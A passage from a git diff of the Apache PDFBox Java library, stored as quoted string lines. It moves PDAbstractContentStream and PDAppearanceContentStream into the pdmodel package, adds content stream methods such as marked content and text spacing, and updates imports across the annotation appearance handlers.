block.\");", - "+ }", - "+ if (miterLimit <= 0.0)", - "+ {", - "+ throw new IllegalArgumentException(\"A miter limit <= 0 is invalid and will not render in Acrobat Reader\");", - "+ }", - "+ writeOperand(miterLimit);", - "+ writeOperator(\"M\");", - "+ }", - "+", - "+ /**", - "+ * Begin a marked content sequence.", - "+ *", - "+ * @param tag the tag", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ public void beginMarkedContent(COSName tag) throws IOException", - "+ {", - "+ writeOperand(tag);", - "+ writeOperator(\"BMC\");", - "+ }", - "+", - "+ /**", - "+ * Begin a marked content sequence with a reference to an entry in the page resources'", - "+ * Properties dictionary.", - "+ *", - "+ * @param tag the tag", - "+ * @param propertyList property list", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ public void beginMarkedContent(COSName tag, PDPropertyList propertyList) throws IOException", - "+ {", - "+ writeOperand(tag);", - "+ writeOperand(resources.add(propertyList));", - "+ writeOperator(\"BDC\");", - "+ }", - "+", - "+ /**", - "+ * End a marked content sequence.", - "+ *", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ public void endMarkedContent() throws IOException", - "+ {", - "+ writeOperator(\"EMC\");", - "+ }", - "+", - "+ /**", - "+ * Set an extended graphics state.", - "+ * ", - "+ * @param state The extended graphics state.", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setGraphicsStateParameters(PDExtendedGraphicsState state) throws IOException", - "+ {", - "+ writeOperand(resources.add(state));", - "+ writeOperator(\"gs\");", - "+ }", - "+", - "+ /**", - "+ * Write a comment line.", - "+ *", - "+ * @param comment", - "+ * @throws IOException If the content stream could not be written.", - "+ * @throws IllegalArgumentException If the comment contains a newline. This is not allowed,", - "+ * because the next line could be ordinary PDF content.", - "+ */", - "+ public void addComment(String comment) throws IOException", - "+ {", - "+ if (comment.indexOf('\\n') >= 0 || comment.indexOf('\\r') >= 0)", - "+ {", - "+ throw new IllegalArgumentException(\"comment should not include a newline\");", - "+ }", - "+ outputStream.write('%');", - "+ outputStream.write(comment.getBytes(Charsets.US_ASCII));", - "+ outputStream.write('\\n');", - "+ }", - "+", - "+ /**", - "+ * Writes a real number to the content stream.", - "+ * @param real", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeOperand(float real) throws IOException", - "+ {", - "+ int byteCount = NumberFormatUtil.formatFloatFast(real, formatDecimal.getMaximumFractionDigits(), formatBuffer);", - "+", - "+ if (byteCount == -1)", - "+ {", - "+ //Fast formatting failed", - "+ write(formatDecimal.format(real));", - "+ }", - "+ else", - "+ {", - "+ outputStream.write(formatBuffer, 0, byteCount);", - "+ }", - "+ outputStream.write(' ');", - "+ }", - "+", - "+ /**", - "+ * Writes an integer number to the content stream.", - "+ * @param integer", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeOperand(int integer) throws IOException", - "+ {", - "+ write(formatDecimal.format(integer));", - "+ outputStream.write(' ');", - "+ }", - "+", - "+ /**", - "+ * Writes a COSName to the content stream.", - "+ * @param name", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeOperand(COSName name) throws IOException", - "+ {", - "+ name.writePDF(outputStream);", - "+ outputStream.write(' ');", - "+ }", - "+", - "+ /**", - "+ * Writes a string to the content stream as ASCII.", - "+ * @param text", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeOperator(String text) throws IOException", - "+ {", - "+ outputStream.write(text.getBytes(Charsets.US_ASCII));", - "+ outputStream.write('\\n');", - "+ }", - "+", - "+ /**", - "+ * Writes a string to the content stream as ASCII.", - "+ * @param text", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void write(String text) throws IOException", - "+ {", - "+ outputStream.write(text.getBytes(Charsets.US_ASCII));", - "+ }", - "+", - "+ /**", - "+ * Writes a byte[] to the content stream.", - "+ * @param data", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void write(byte[] data) throws IOException", - "+ {", - "+ outputStream.write(data);", - "+ }", - "+ ", - "+ /**", - "+ * Writes a newline to the content stream as ASCII.", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeLine() throws IOException", - "+ {", - "+ outputStream.write('\\n');", - "+ }", - "+", - "+ /**", - "+ * Writes binary data to the content stream.", - "+ * @param data", - "+ * @throws java.io.IOException", - "+ */", - "+ protected void writeBytes(byte[] data) throws IOException", - "+ {", - "+ outputStream.write(data);", - "+ }", - "+", - "+ /**", - "+ * Writes an AffineTransform to the content stream as an array.", - "+ */", - "+ private void writeAffineTransform(AffineTransform transform) throws IOException", - "+ {", - "+ double[] values = new double[6];", - "+ transform.getMatrix(values);", - "+ for (double v : values)", - "+ {", - "+ writeOperand((float) v);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Close the content stream. This must be called when you are done with this object.", - "+ *", - "+ * @throws IOException If the underlying stream has a problem being written to.", - "+ */", - "+ @Override", - "+ public void close() throws IOException", - "+ {", - "+ if (outputStream != null)", - "+ {", - "+ outputStream.close();", - "+ outputStream = null;", - "+ }", - "+ }", - "+", - "+ protected boolean isOutside255Interval(int val)", - "+ {", - "+ return val < 0 || val > 255;", - "+ }", - "+", - "+ private boolean isOutsideOneInterval(double val)", - "+ {", - "+ return val < 0 || val > 1;", - "+ }", - "+", - "+ protected void setStrokingColorSpaceStack(PDColorSpace colorSpace)", - "+ {", - "+ if (strokingColorSpaceStack.isEmpty())", - "+ {", - "+ strokingColorSpaceStack.add(colorSpace);", - "+ }", - "+ else", - "+ {", - "+ strokingColorSpaceStack.setElementAt(colorSpace, strokingColorSpaceStack.size() - 1);", - "+ }", - "+ }", - "+", - "+ protected void setNonStrokingColorSpaceStack(PDColorSpace colorSpace)", - "+ {", - "+ if (nonStrokingColorSpaceStack.isEmpty())", - "+ {", - "+ nonStrokingColorSpaceStack.add(colorSpace);", - "+ }", - "+ else", - "+ {", - "+ nonStrokingColorSpaceStack.setElementAt(colorSpace, nonStrokingColorSpaceStack.size() - 1);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the character spacing. The value shall be added to the horizontal or vertical component", - "+ * of the glyph's displacement, depending on the writing mode.", - "+ *", - "+ * @param spacing character spacing", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setCharacterSpacing(float spacing) throws IOException", - "+ {", - "+ writeOperand(spacing);", - "+ writeOperator(\"Tc\");", - "+ }", - "+", - "+ /**", - "+ * Set the word spacing. The value shall be added to the horizontal or vertical component of the", - "+ * ASCII SPACE character, depending on the writing mode.", - "+ *

    ", - "+ * This will have an effect only with Type1 and TrueType fonts, not with Type0 fonts. The PDF", - "+ * specification tells why: \"Word spacing shall be applied to every occurrence of the", - "+ * single-byte character code 32 in a string when using a simple font or a composite font that", - "+ * defines code 32 as a single-byte code. It shall not apply to occurrences of the byte value 32", - "+ * in multiple-byte codes.\"", - "+ *", - "+ * @param spacing word spacing", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setWordSpacing(float spacing) throws IOException", - "+ {", - "+ writeOperand(spacing);", - "+ writeOperator(\"Tw\");", - "+ }", - "+", - "+ /**", - "+ * Set the horizontal scaling to scale / 100.", - "+ *", - "+ * @param scale number specifying the percentage of the normal width. Default value: 100 (normal", - "+ * width).", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ public void setHorizontalScaling(float scale) throws IOException", - "+ {", - "+ writeOperand(scale);", - "+ writeOperator(\"Tz\");", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "new file mode 100644", - "index 000000000..a67e56735", - "--- /dev/null", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "@@ -0,0 +1,245 @@", - "+/*", - "+ * Licensed to the Apache Software Foundation (ASF) under one or more", - "+ * contributor license agreements. See the NOTICE file distributed with", - "+ * this work for additional information regarding copyright ownership.", - "+ * The ASF licenses this file to You under the Apache License, Version 2.0", - "+ * (the \"License\"); you may not use this file except in compliance with", - "+ * the License. You may obtain a copy of the License at", - "+ *", - "+ * http://www.apache.org/licenses/LICENSE-2.0", - "+ *", - "+ * Unless required by applicable law or agreed to in writing, software", - "+ * distributed under the License is distributed on an \"AS IS\" BASIS,", - "+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", - "+ * See the License for the specific language governing permissions and", - "+ * limitations under the License.", - "+ */", - "+package org.apache.pdfbox.pdmodel;", - "+", - "+import java.io.Closeable;", - "+import java.io.IOException;", - "+import java.io.OutputStream;", - "+", - "+import org.apache.pdfbox.cos.COSName;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "+", - "+/**", - "+ * Provides the ability to write to a page content stream.", - "+ *", - "+ * @author Ben Litchfield", - "+ */", - "+public final class PDAppearanceContentStream extends PDAbstractContentStream implements Closeable", - "+{", - "+ /**", - "+ * Create a new appearance stream.", - "+ *", - "+ * @param appearance", - "+ * The appearance stream to write to.", - "+ * @throws IOException", - "+ * If there is an error writing to the page contents.", - "+ */", - "+ public PDAppearanceContentStream(PDAppearanceStream appearance) throws IOException", - "+ {", - "+ this(appearance, appearance.getStream().createOutputStream());", - "+ }", - "+", - "+ /**", - "+ * Create a new appearance stream. Note that this is not actually a \"page\"", - "+ * content stream.", - "+ *", - "+ * @param appearance", - "+ * The appearance stream to add to.", - "+ * @param outputStream", - "+ * The appearances output stream to write to.", - "+ */", - "+ public PDAppearanceContentStream(PDAppearanceStream appearance, OutputStream outputStream)", - "+ {", - "+ super(outputStream);", - "+ setResources(appearance.getResources());", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color.", - "+ * ", - "+ *

    ", - "+ * The command is only emitted if the color is not null and the number of", - "+ * components is gt 0.", - "+ * ", - "+ * @see PDAbstractContentStream#setStrokingColor(PDColor)", - "+ */", - "+ public boolean setStrokingColorOnDemand(PDColor color) throws IOException", - "+ {", - "+ if (color != null)", - "+ {", - "+ float[] components = color.getComponents();", - "+ if (components.length > 0)", - "+ {", - "+ setStrokingColor(components);", - "+ return true;", - "+ }", - "+ }", - "+ return false;", - "+ }", - "+", - "+ /**", - "+ * Set the stroking color.", - "+ * ", - "+ * @see PDAbstractContentStream#setStrokingColor(java.awt.Color)", - "+ * @param components", - "+ * the color components dependent on the color space being used.", - "+ * @throws IOException", - "+ * if an IO error occurs while writing to the stream.", - "+ */", - "+ public void setStrokingColor(float[] components) throws IOException", - "+ {", - "+ for (float value : components)", - "+ {", - "+ writeOperand(value);", - "+ }", - "+", - "+ int numComponents = components.length;", - "+ switch (numComponents)", - "+ {", - "+ case 1:", - "+ writeOperator(\"G\");", - "+ break;", - "+ case 3:", - "+ writeOperator(\"RG\");", - "+ break;", - "+ case 4:", - "+ writeOperator(\"K\");", - "+ break;", - "+ default:", - "+ break;", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Set the non stroking color.", - "+ * ", - "+ *

    ", - "+ * The command is only emitted if the color is not null and the number of", - "+ * components is gt 0.", - "+ * ", - "+ * @see PDAbstractContentStream#setNonStrokingColor(PDColor)", - "+ */", - "+ public boolean setNonStrokingColorOnDemand(PDColor color) throws IOException", - "+ {", - "+ if (color != null)", - "+ {", - "+ float[] components = color.getComponents();", - "+ if (components.length > 0)", - "+ {", - "+ setNonStrokingColor(components);", - "+ return true;", - "+ }", - "+ }", - "+ return false;", - "+ }", - "+", - "+ /**", - "+ * Set the non stroking color.", - "+ * ", - "+ * @see PDAbstractContentStream#setNonStrokingColor(java.awt.Color)", - "+ * @param components", - "+ * the color components dependent on the color space being used.", - "+ * @throws IOException", - "+ * if an IO error occurs while writing to the stream.", - "+ */", - "+ public void setNonStrokingColor(float[] components) throws IOException", - "+ {", - "+ for (float value : components)", - "+ {", - "+ writeOperand(value);", - "+ }", - "+", - "+ int numComponents = components.length;", - "+ switch (numComponents)", - "+ {", - "+ case 1:", - "+ writeOperator(\"g\");", - "+ break;", - "+ case 3:", - "+ writeOperator(\"rg\");", - "+ break;", - "+ case 4:", - "+ writeOperator(\"k\");", - "+ break;", - "+ default:", - "+ break;", - "+ }", - "+ }", - "+", - "+ public void setBorderLine(float lineWidth, PDBorderStyleDictionary bs) throws IOException", - "+ {", - "+ // Can't use PDBorderStyleDictionary.getDashStyle() as", - "+ // this will return a default dash style if non is existing", - "+ if (bs != null && bs.getCOSObject().containsKey(COSName.D) && ", - "+ bs.getStyle().equals(PDBorderStyleDictionary.STYLE_DASHED))", - "+ {", - "+ setLineDashPattern(bs.getDashStyle().getDashArray(), 0);", - "+ }", - "+ setLineWidthOnDemand(lineWidth);", - "+ }", - "+", - "+ /**", - "+ * Sets the line width. The command is only emitted if the lineWidth is", - "+ * different to 1.", - "+ * ", - "+ * @param lineWidth the line width of the path.", - "+ * @throws java.io.IOException", - "+ * @see PDAbstractContentStream#setLineWidth(float)", - "+ */", - "+ public void setLineWidthOnDemand(float lineWidth) throws IOException", - "+ {", - "+ // Acrobat doesn't write a line width command", - "+ // for a line width of 1 as this is default.", - "+ // Will do the same.", - "+ if (!(Math.abs(lineWidth - 1) < 1e-6))", - "+ {", - "+ setLineWidth(lineWidth);", - "+ }", - "+ }", - "+ ", - "+ /**", - "+ * Draw a shape.", - "+ *", - "+ *

    ", - "+ * Dependent on the lineWidth and whether or not there is a background to be generated there are", - "+ * different commands to be used for draw a shape.", - "+ *", - "+ * @param lineWidth the line width of the path.", - "+ * @param hasStroke shall there be a stroking color.", - "+ * @param hasFill shall there be a fill color.", - "+ * @throws IOException if an IO error occurs while writing to the stream.", - "+ */", - "+ public void drawShape(float lineWidth, boolean hasStroke, boolean hasFill) throws IOException", - "+ {", - "+ // initial setting if stroking shall be done", - "+ boolean resolvedHasStroke = hasStroke;", - "+", - "+ // no stroking for very small lines", - "+ if (lineWidth < 1e-6)", - "+ {", - "+ resolvedHasStroke = false;", - "+ }", - "+ if (hasFill && resolvedHasStroke)", - "+ {", - "+ fillAndStroke();", - "+ }", - "+ else if (resolvedHasStroke)", - "+ {", - "+ stroke();", - "+ }", - "+ else if (hasFill)", - "+ {", - "+ fill();", - "+ }", - "+ else", - "+ {", - "+ writeOperator(\"n\");", - "+ }", - "+ }", - "+}", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "index 041e583c3..c2516de8a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDFormContentStream.java", - "@@ -18,3 +18,3 @@ package org.apache.pdfbox.pdmodel;", - " import java.io.IOException;", - "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - "+", - " import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", - "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.graphics.form.PDFormXObject;", - " */", - "-public class PDFormContentStream extends PDAbstractContentStream", - "+public final class PDFormContentStream extends PDAbstractContentStream", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "index bc0743854..6d4cc2bb4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPageContentStream.java", - "@@ -40,3 +40,2 @@ import org.apache.fontbox.ttf.gsub.GsubWorkerFactory;", - " import org.apache.fontbox.ttf.model.GsubData;", - "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - " import org.apache.pdfbox.cos.COSArray;", - "@@ -70,3 +69,2 @@ public final class PDPageContentStream extends PDAbstractContentStream implement", - " {", - "- ", - " /**", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "index eb91689b2..bce28f614 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDPatternContentStream.java", - "@@ -18,3 +18,3 @@ package org.apache.pdfbox.pdmodel;", - " import java.io.IOException;", - "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - "+", - " import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", - "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.graphics.pattern.PDTilingPattern;", - " */", - "-public class PDPatternContentStream extends PDAbstractContentStream", - "+public final class PDPatternContentStream extends PDAbstractContentStream", - " {", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "index 70dd019d2..7eeaf7790 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "@@ -26,3 +26,3 @@ import java.util.ArrayList;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index c5be7ec98..237894792 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquareCircle;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceDictionary;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "index 3422cef96..37ed620c5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "@@ -23,3 +23,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCaret;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "index e6258467f..44597db82 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "@@ -28,3 +28,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCircle;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "index 59aa9f0c9..9dbe3e54d 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", - "@@ -33,3 +33,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationHighlight;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "index 55e9e3b11..eaf4bbb81 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", - "@@ -24,3 +24,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationInk;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 8ba70da90..cef278c71 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -23,3 +23,3 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "-import org.apache.pdfbox.contentstream.PDAbstractContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAbstractContentStream;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.util.Matrix;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "index aca2bc378..95d6bcfeb 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", - "@@ -31,3 +31,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLink;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index c7ad9846e..a2823dc5c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index 18c59cd6a..9512c613f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -29,3 +29,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "index 31c295432..26dc670b5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "@@ -30,3 +30,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "index 6cf33d043..e94159df5 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationStrikeout;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "index 2da253417..840c1d538 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "@@ -25,3 +25,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationUnderline;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "index b8dcb585e..03218edb2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/AppearanceGeneratorHelper.java", - "@@ -39,3 +39,3 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationWidget;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceCharacteristicsDictionary;", - "-import 